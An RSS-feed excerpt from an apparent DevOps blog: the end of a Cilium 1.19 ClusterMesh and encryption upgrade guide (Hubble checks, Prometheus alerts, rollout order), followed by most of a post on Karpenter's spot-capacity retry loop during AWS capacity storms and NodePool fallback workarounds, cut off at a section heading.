        <a href="#h2-detecting-drops-with-hubble" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Detecting drops with Hubble
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-detecting-drops-with-hubble"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>You will need Hubble both for pre-flight validation and post-upgrade verification.</p>
<pre><code class="hljs language-bash"><span class="hljs-comment"># Cross-cluster traffic that currently works, BEFORE upgrade.</span>
<span class="hljs-comment"># Capture a representative window — a full day if your workload is daily-batchy.</span>
hubble observe \
  --cluster &lt;remote-cluster-name&gt; \
  --verdict FORWARDED \
  --since 24h \
  --output jsonpb &gt; pre-upgrade-east-west.jsonl
</code></pre><p>Save that file. It is the ground truth of what worked. Post-upgrade, you re-run the equivalent query and diff. Any traffic that was FORWARDED before and is now DROPPED is a policy you missed.</p>
<p>After upgrade, watch for policy drops with the originating rule attribution (1.19 includes the rule name in drop events, which 1.18 did not):</p>
<pre><code class="hljs language-bash"><span class="hljs-comment"># Policy drops with rule names</span>
hubble observe --verdict DROPPED --<span class="hljs-built_in">type</span> policy-verdict --since 10m -f
</code></pre><p>Strict-encryption-specific filters added in 1.19 (PR <code>#43096</code>):</p>
<pre><code class="hljs language-bash">hubble observe --unencrypted --since 5m   <span class="hljs-comment"># cleartext flows</span>
hubble observe --encrypted                <span class="hljs-comment"># encrypted flows</span>
</code></pre><p>Useful even if you are not flipping strict mode, because it confirms encryption is happening where you expect.</p>
<h2 id="h2-prometheus-metrics-worth-alerting-on" class="group relative scroll-mt-24">
        <a href="#h2-prometheus-metrics-worth-alerting-on" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Prometheus metrics worth alerting on
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-prometheus-metrics-worth-alerting-on"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><pre><code class="hljs language-promql"># Sudden policy-drop spike after upgrade
rate(cilium_drop_count_total{reason=&quot;Policy denied&quot;}[5m])

# Forward/drop ratio inversion is the clearest &quot;something broke&quot; signal
sum(rate(cilium_forward_count_total[5m]))
  /
sum(rate(cilium_drop_count_total[5m]))

# IPsec health (worth watching if you are running encryption at all,
# strict or not)
cilium_ipsec_xfrm_error
cilium_ipsec_xfrm_states{direction=&quot;in&quot;}

# Confirm transparent encryption is on where you expect
cilium_feature_datapath_transparent_encryption{mode=&quot;wireguard&quot;}
</code></pre><p>The metric names have shifted a bit across releases. The 1.19 metrics reference documents the current set. If you have alerts on <code>cilium_policy_l7_denied_total</code> from older docs, double-check the metric is still emitted under that exact name on 1.19 before relying on it.</p>
<h2 id="h2-the-safe-enable-order" class="group relative scroll-mt-24">
        <a href="#h2-the-safe-enable-order" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The safe enable-order
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-the-safe-enable-order"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>Sequence the upgrade so each change is isolated. The whole sequence is one release cycle, not one maintenance window.</p>
<pre><code class="hljs language-text">Day 0 (1.18, planning)
  - Run: cilium clustermesh inspect-policy-default-local-cluster --all-namespaces
  - Audit. Add io.cilium.k8s.policy.cluster selectors to policies that
    intentionally cross clusters.
  - Capture a baseline:
      hubble observe --cluster &lt;remote&gt; --verdict FORWARDED --since 24h
        &gt; pre-upgrade-east-west.jsonl
  - Rename any encryption.strictMode.* Helm keys to encryption.strictMode.egress.*

Day 1 (1.18 to 1.19 upgrade)
  - helm upgrade with:
      clustermesh.policyDefaultLocalCluster: false
      encryption.strictMode.ingress.enabled: false
  - Validate connectivity unchanged.

Day 1+1h (post-upgrade gate)
  - Re-run hubble observe --cluster &lt;remote&gt; --verdict FORWARDED.
    Diff against pre-upgrade-east-west.jsonl. Should be approximately identical.
  - hubble observe --verdict DROPPED --type policy-verdict.
    Quiet for legitimate traffic.

Day 7 (audit complete)
  - Flip clustermesh.policyDefaultLocalCluster: true
  - Watch cilium_drop_count_total{reason=&quot;Policy denied&quot;} for an hour.
    Spikes mean a policy still relies on implicit cross-cluster.

Day 8+ (optional strict encryption rollout)
  - If you want strict ingress encryption, enable it on one node first
    via per-node config override.
  - hubble observe --unencrypted should be quiet for that node&#x27;s
    workloads.
  - Roll node by node.
</code></pre><p>A small thing that matters: do not flip <code>policyDefaultLocalCluster</code> and enable ingress strict mode in the same change window. You cannot tell which one caused a drop if both fire at once.</p>
<h2 id="h2-recovery-if-you-skipped-the-audit" class="group relative scroll-mt-24">
        <a href="#h2-recovery-if-you-skipped-the-audit" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Recovery, if you skipped the audit
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-recovery-if-you-skipped-the-audit"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>If you have already upgraded without running the inspect command and traffic is being dropped:</p>
<ol>
<li>Roll the Helm value: <code>clustermesh.policyDefaultLocalCluster: false</code>. This restores 1.18 semantics. East/West traffic resumes.</li>
<li>Run <code>cilium clustermesh inspect-policy-default-local-cluster --all-namespaces</code> (it works on 1.19 too, it just lists policies that <em>would</em> differ if you flipped the default).</li>
<li>Migrate the policies.</li>
<li>Flip the value back to <code>true</code>.</li>
</ol>
<p>This is recoverable. It is also avoidable. Run the inspect command on 1.18 and you skip the firefight.</p>
<h2 id="h2-summary" class="group relative scroll-mt-24">
        <a href="#h2-summary" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Summary
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-summary"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>The 1.19 ClusterMesh policy-default flip is the one upgrade item that silently breaks production. The encryption strict-mode changes are knobs, not defaults. The order of operations to upgrade cleanly:</p>
<ol>
<li>Audit policies on 1.18 with <code>cilium clustermesh inspect-policy-default-local-cluster --all-namespaces</code>. Add explicit <code>io.cilium.k8s.policy.cluster</code> selectors where cross-cluster traffic was intentional.</li>
<li>Upgrade with <code>clustermesh.policyDefaultLocalCluster: false</code> as a one-release escape hatch.</li>
<li>Rename any deprecated <code>encryption.strictMode.*</code> Helm keys to <code>encryption.strictMode.egress.*</code>.</li>
<li>Validate post-upgrade with Hubble against a pre-upgrade traffic capture.</li>
<li>Flip <code>policyDefaultLocalCluster</code> back to <code>true</code> once the audit is complete and traffic is clean.</li>
<li>Roll ingress strict encryption separately, node by node, only after the policy migration has settled.</li>
</ol>
<p>The hardest part of this upgrade is not the upgrade. It is the audit. Run the inspect command on your live 1.18 cluster today, before the maintenance window. The rest of the steps are mechanical.</p>
]]></content:encoded>
    </item>
    <item>
      <title><![CDATA[Karpenter Spot Storm Fallback Gap: The Production Loop Nobody Talks About]]></title>
      <link>https://devops-daily.com/posts/karpenter-spot-storm-fallback-gap</link>
      <description><![CDATA[When AWS spot capacity dries up in a region, Karpenter does not automatically fall back to on-demand. It retries the same dying offerings on a 3-minute loop. Here is why, and how to design around it.]]></description>
      <pubDate>Mon, 18 May 2026 09:00:00 GMT</pubDate>
      <guid isPermaLink="true">https://devops-daily.com/posts/karpenter-spot-storm-fallback-gap</guid>
      <category><![CDATA[Kubernetes]]></category>
      <author><![CDATA[DevOps Daily Team]]></author>
      <category><![CDATA[Kubernetes]]></category><category><![CDATA[Karpenter]]></category><category><![CDATA[AWS]]></category><category><![CDATA[Spot Instances]]></category><category><![CDATA[Autoscaling]]></category><category><![CDATA[SRE]]></category>
      <content:encoded><![CDATA[<p>Karpenter sells itself as the smart spot handler for Kubernetes on AWS. Wide instance-type pools, fast bin-packing, automatic interruption draining. Most of the time it lives up to that pitch. Then your region enters a spot-capacity storm at 3pm on a Tuesday, half your nodes get reclaimed in fifteen minutes, and Karpenter keeps trying to launch fresh spot nodes that EC2 immediately refuses. Pods stay Pending for an hour. On-demand capacity sits right there. Karpenter never touches it.</p>
<p>This post is a walk through that scenario: what Karpenter is actually doing during a storm, why the maintainers consider it intentional, the workarounds that hold up in production, and the metrics that catch the loop before your customers do.</p>
<h2 id="h2-tldr" class="group relative scroll-mt-24">
        <a href="#h2-tldr" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          TLDR
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-tldr"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><ul>
<li>Karpenter caches &quot;unavailable&quot; spot offerings (instance-type plus AZ plus capacity-type) for a hard-coded 3 minutes, then retries. During a regional storm the retries fail again, and the loop repeats.</li>
<li>Fallback to on-demand fires only when every compatible spot offering in a single NodePool gets ICE&#39;d inside the same scheduling pass. It does not fire on interruption rate.</li>
<li>Maintainers have closed the obvious &quot;automatic spot-interruption fallback&quot; feature request (<code>#8298</code>) as working-as-intended. The official answer is: use wider requirements, <code>minValues</code>, and weighted NodePools.</li>
<li>Production posture today: a weighted spot NodePool with <code>minValues</code> across multiple instance families, a separate on-demand NodePool tainted with <code>karpenter.sh/capacity-type=on-demand:NoSchedule</code>, and alerts on <code>karpenter_cloudprovider_errors_total</code> plus <code>karpenter_nodeclaims_disrupted_total{reason=&quot;interruption&quot;}</code>.</li>
</ul>
<h2 id="h2-prerequisites" class="group relative scroll-mt-24">
        <a href="#h2-prerequisites" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Prerequisites
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-prerequisites"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><ul>
<li>A cluster running Karpenter (this post references v1 APIs; the behavior is the same on v0.32+ NodePools).</li>
<li>Familiarity with NodePool, NodeClass, and the v1 <code>requirements</code> schema.</li>
<li>Prometheus scraping Karpenter&#39;s <code>/metrics</code> endpoint.</li>
<li>Cluster-admin or comparable RBAC for editing NodePools.</li>
</ul>
<h2 id="h2-the-exact-behavior-during-a-storm" class="group relative scroll-mt-24">
        <a href="#h2-the-exact-behavior-during-a-storm" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The exact behavior during a storm
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-the-exact-behavior-during-a-storm"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>When <code>CreateFleet</code> returns <code>InsufficientInstanceCapacity</code>, <code>UnfulfillableCapacity</code>, or <code>MaxSpotInstanceCountExceeded</code>, Karpenter writes a log line like this and removes the offering from its in-memory pool:</p>
<pre><code class="hljs language-text">&quot;message&quot;:&quot;failed launching nodeclaim&quot;,
&quot;aws-error-code&quot;:&quot;UnfulfillableCapacity&quot;,
&quot;aws-operation-name&quot;:&quot;CreateFleet&quot;,
&quot;error&quot;:&quot;... InsufficientInstanceCapacity: We currently do not have sufficient c7i.xlarge capacity in the Availability Zone you requested (us-east-1f) ...&quot;

&quot;message&quot;:&quot;removing offering from offerings&quot;,
&quot;reason&quot;:&quot;MaxSpotInstanceCountExceeded&quot;,
&quot;instance-type&quot;:&quot;r8i-flex.xlarge&quot;,&quot;zone&quot;:&quot;us-east-1d&quot;,
&quot;capacity-type&quot;:&quot;spot&quot;,&quot;ttl&quot;:&quot;3m0s&quot;
</code></pre><p>That 3-minute TTL is a hard-coded constant in <code>pkg/cache/cache.go</code>. Three minutes later the offering is back in the pool. Karpenter tries it again. EC2 still does not have spot capacity for <code>c7i.xlarge</code> in <code>us-east-1f</code>. Same log lines. Same eviction. Same wait.</p>
<p>Meanwhile the pods stay Pending. Even if you wrote a second NodePool that allows on-demand, Karpenter will not automatically prefer it during the loop. From maintainer <code>DerekFrank</code> on <code>kubernetes-sigs/karpenter#2275</code>:</p>
<blockquote>
<p>If there aren&#39;t any on-demand <code>g4dn.xlarge</code> instances available in <code>us-east-1a</code>, it doesn&#39;t matter if Karpenter is trying to launch those from NodePool 1 or from NodePool 2. Karpenter won&#39;t retry simply because you have two NodePools.</p>
</blockquote>
<p>The unit of fallback is the <strong>offering</strong>, not the NodePool. A NodePool that requires <code>karpenter.sh/capacity-type In [spot]</code> will never produce an on-demand node, no matter how long the storm lasts. The second NodePool exists, but the scheduler picks based on per-offering availability and per-NodePool weight, not on a &quot;this NodePool is failing, switch&quot; signal.</p>
<p>The clearest reproduction is in <code>aws/karpenter-provider-aws#8885</code>: an Orca Security engineer ran a 1000-replica nginx deployment against weighted spot and on-demand NodePools during a real us-east-1 spot storm. 471 pods stayed Pending for more than an hour. The on-demand NodePool was untouched.</p>
<h2 id="h2-why-the-maintainers-consider-this-intentional" class="group relative scroll-mt-24">
        <a href="#h2-why-the-maintainers-consider-this-intentional" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Why the maintainers consider this intentional
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-why-the-maintainers-consider-this-intentional"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>Two design positions, both still standing as of writing:</p>
<p><strong>The 3-minute TTL is a feature, not a bug.</strong> From <code>jmdeal</code> on <code>#8298</code>:</p>
<blockquote>
<p>Karpenter does keep track of spot interruption events, but a spot interruption will only cause the instance type to be excluded from launch requests for 3 minutes. Spot availability can change quickly, so we don&#39;t want to opt out of using spot for too long.</p>
</blockquote>
<p>The argument is that AWS spot pools recover fast. If Karpenter dropped the offering for an hour after one ICE event, you would miss capacity coming back online. So the cache stays short.</p>
<p><strong>The official solution is wide requirements plus <code>minValues</code>, not automatic fallback.</strong> Karpenter assumes that if you give EC2 enough latitude in the <code>CreateFleet</code> call (many instance families, multiple sizes, multiple AZs), the price-capacity-optimized strategy will find a spot pool with capacity. Issue <code>#8298</code>, which asked for &quot;automatic spot interruption detection and on-demand fallback,&quot; was closed without implementation.</p>
<p>This is internally consistent. It is also a bad fit for two real-world scenarios:</p>
<ol>
<li><strong>Workloads with narrow instance-type constraints.</strong> GPU pods, license-pinned workloads, anything that pins to a specific family. The pool of compatible offerings is small. When it dries up, there is nothing for <code>CreateFleet</code> to fall back to within the spot capacity-type.</li>
<li><strong>Regional spot storms.</strong> When a whole region has spot pressure, widening requirements does not help. Every family is ICE&#39;d.</li>
</ol>
<p>For both cases you need an explicit fallback path. Karpenter will not build it for you.</p>
<h2 id="h2-workaround-1-weighted-nodepools-with-wide-requirements" class="group relative scroll-mt-24">
        <a href="#h2-workaround-1-weighted-nodepools-with-wide-requirements" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Workaround 1: weighted NodePools with wide requirements
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-workaround-1-weighted-nodepools-with-wide-requirements"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>The official pattern. The spot NodePool runs at high weight and very wide requirements. The on-demand NodePool runs at low weight and is intended as the safety net.</p>
<pre><code class="hljs language-yaml"><span class="hljs-attr">apiVersion:</span> <span class="hljs-string">karpenter.sh/v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">NodePool</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">spot</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">weight:</span> <span class="hljs-number">100</span>
  <span class="hljs-attr">template:</span>
    <span class="hljs-attr">spec:</span>
      <span class="hljs-attr">requirements:</span>
        <span class="hljs-bullet">-</span> <span class="hljs-attr">key:</span> <span class="hljs-string">karpenter.sh/capacity-type</span>
          <span class="hljs-attr">operator:</span> <span class="hljs-string">In</span>
          <span class="hljs-attr">values:</span> [<span class="hljs-string">&quot;spot&quot;</span>]
        <span class="hljs-bullet">-</span> <span class="hljs-attr">key:</span> <span class="hljs-string">karpenter.k8s.aws/instance-family</span>
          <span class="hljs-attr">operator:</span> <span class="hljs-string">In</span>
          <span class="hljs-attr">values:</span> [<span class="hljs-string">&quot;c7i&quot;</span>, <span class="hljs-string">&quot;c6i&quot;</span>, <span class="hljs-string">&quot;m7i&quot;</span>, <span class="hljs-string">&quot;m6i&quot;</span>, <span class="hljs-string">&quot;r7i&quot;</span>, <span class="hljs-string">&quot;r6i&quot;</span>]
          <span class="hljs-attr">minValues:</span> <span class="hljs-number">6</span>
        <span class="hljs-bullet">-</span> <span class="hljs-attr">key:</span> <span class="hljs-string">karpenter.k8s.aws/instance-cpu</span>
          <span class="hljs-attr">operator:</span> <span class="hljs-string">In</span>
          <span class="hljs-attr">values:</span> [<span class="hljs-string">&quot;2&quot;</span>, <span class="hljs-string">&quot;4&quot;</span>, <span class="hljs-string">&quot;8&quot;</span>]
          <span class="hljs-attr">minValues:</span> <span class="hljs-number">3</span>
        <span class="hljs-bullet">-</span> <span class="hljs-attr">key:</span> <span class="hljs-string">kubernetes.io/arch</span>
          <span class="hljs-attr">operator:</span> <span class="hljs-string">In</span>
          <span class="hljs-attr">values:</span> [<span class="hljs-string">&quot;amd64&quot;</span>]
      <span class="hljs-attr">nodeClassRef:</span>
        <span class="hljs-attr">group:</span> <span class="hljs-string">karpenter.k8s.aws</span>
        <span class="hljs-attr">kind:</span> <span class="hljs-string">EC2NodeClass</span>
        <span class="hljs-attr">name:</span> <span class="hljs-string">default</span>
<span class="hljs-meta">---</span>
<span class="hljs-attr">apiVersion:</span> <span class="hljs-string">karpenter.sh/v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">NodePool</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">on-demand-fallback</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">weight:</span> <span class="hljs-number">10</span>
  <span class="hljs-attr">template:</span>
    <span class="hljs-attr">spec:</span>
      <span class="hljs-attr">requirements:</span>
        <span class="hljs-bullet">-</span> <span class="hljs-attr">key:</span> <span class="hljs-string">karpenter.sh/capacity-type</span>
          <span class="hljs-attr">operator:</span> <span class="hljs-string">In</span>
          <span class="hljs-attr">values:</span> [<span class="hljs-string">&quot;on-demand&quot;</span>]
        <span class="hljs-bullet">-</span> <span class="hljs-attr">key:</span> <span class="hljs-string">karpenter.k8s.aws/instance-family</span>
          <span class="hljs-attr">operator:</span> <span class="hljs-string">In</span>
          <span class="hljs-attr">values:</span> [<span class="hljs-string">&quot;c7i&quot;</span>, <span class="hljs-string">&quot;c6i&quot;</span>, <span class="hljs-string">&quot;m7i&quot;</span>, <span class="hljs-string">&quot;m6i&quot;</span>, <span class="hljs-string">&quot;r7i&quot;</span>, <span class="hljs-string">&quot;r6i&quot;</span>]
          <span class="hljs-attr">minValues:</span> <span class="hljs-number">6</span>
        <span class="hljs-bullet">-</span> <span class="hljs-attr">key:</span> <span class="hljs-string">karpenter.k8s.aws/instance-cpu</span>
          <span class="hljs-attr">operator:</span> <span class="hljs-string">In</span>
          <span class="hljs-attr">values:</span> [<span class="hljs-string">&quot;2&quot;</span>, <span class="hljs-string">&quot;4&quot;</span>, <span class="hljs-string">&quot;8&quot;</span>]
          <span class="hljs-attr">minValues:</span> <span class="hljs-number">3</span>
        <span class="hljs-bullet">-</span> <span class="hljs-attr">key:</span> <span class="hljs-string">kubernetes.io/arch</span>
          <span class="hljs-attr">operator:</span> <span class="hljs-string">In</span>
          <span class="hljs-attr">values:</span> [<span class="hljs-string">&quot;amd64&quot;</span>]
      <span class="hljs-attr">nodeClassRef:</span>
        <span class="hljs-attr">group:</span> <span class="hljs-string">karpenter.k8s.aws</span>
        <span class="hljs-attr">kind:</span> <span class="hljs-string">EC2NodeClass</span>
        <span class="hljs-attr">name:</span> <span class="hljs-string">default</span>
</code></pre><p>The <code>minValues</code> requirement is the single most important knob during a storm. <code>minValues: 6</code> on <code>instance-family</code> forces <code>CreateFleet</code> to evaluate six different families in the same call. EC2&#39;s price-capacity-optimized strategy picks whichever has capacity. You go from &quot;the c7i pool is empty, fail&quot; to &quot;the c7i pool is empty, try m7i, m6i, r7i, r6i, c6i.&quot;</p>
<p>Caveat from the Karpenter docs themselves: weighted NodePools are a preference, not a policy.</p>
<blockquote>
<p>Based on the way that Karpenter performs pod batching and bin packing, it is not guaranteed that Karpenter will always choose the highest priority NodePool given specific requirements.</p>
</blockquote>
<p>Treat weight as a tiebreaker that mostly works, not a guarantee.</p>
<h2 id="h2-workaround-2-capacity-type-taint-on-the-on-demand-pool" class="group relative scroll-mt-24">
        <a href="#h2-workaround-2-capacity-type-taint-on-the-on-demand-pool" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Workaround 2: capacity-type taint on the on-demand pool
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-workaround-2-capacity-type-taint-on-the-on-demand-pool"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>Without a taint, pods can land on either NodePool. With a heavy spot workload that occasionally bursts to on-demand, you want pods to prefer spot even when on-demand is available. A taint on the on-demand NodePool forces an explicit toleration:</p>
<pre><code class="hljs language-yaml"><span class="hljs-attr">apiVersion:</span> <span class="hljs-string">karpenter.sh/v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">NodePool</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">on-demand-fallback</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">weight:</span> <span class="hljs-number">10</span>
  <span class="hljs-attr">template:</span>
    <span class="hljs-attr">spec:</span>
      <span class="hljs-attr">taints:</span>
        <span class="hljs-bullet">-</span> <span class="hljs-attr">key:</span> <span class="hljs-string">karpenter.sh/capacity-type</span>
          <span class="hljs-attr">value:</span> <span class="hljs-string">on-demand</span>
          <span class="hljs-attr">effect:</span> <span class="hljs-string">NoSchedule</span>
      <span class="hljs-attr">requirements:</span>
        <span class="hljs-bullet">-</span> <span class="hljs-attr">key:</span> <span class="hljs-string">karpenter.sh/capacity-type</span>
          <span class="hljs-attr">operator:</span> <span class="hljs-string">In</span>
          <span class="hljs-attr">values:</span> [<span class="hljs-string">&quot;on-demand&quot;</span>]
        <span class="hljs-comment"># ... family/cpu/arch as above</span>
</code></pre><p>Workloads that should fail over add the toleration:</p>
<pre><code class="hljs language-yaml"><span class="hljs-attr">spec:</span>
  <span class="hljs-attr">tolerations:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">key:</span> <span class="hljs-string">karpenter.sh/capacity-type</span>
      <span class="hljs-attr">operator:</span> <span class="hljs-string">Equal</span>
      <span class="hljs-attr">value:</span> <span class="hljs-string">on-demand</span>
      <span class="hljs-attr">effect:</span> <span class="hljs-string">NoSchedule</span>
</code></pre><p>This gives you two benefits. First, on-demand becomes opt-in per workload, so a misconfigured deployment cannot accidentally burn money. Second, your dashboards now show &quot;on-demand nodes provisioned&quot; as a clean signal that fallback fired, since on-demand only happens for tolerating workloads.</p>
<h2 id="h2-workaround-3-a-tiny-external-controller" class="group relative scroll-mt-24">
        <a href="#h2-workaround-3-a-tiny-external-controller" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Workaround 3: a tiny external controller
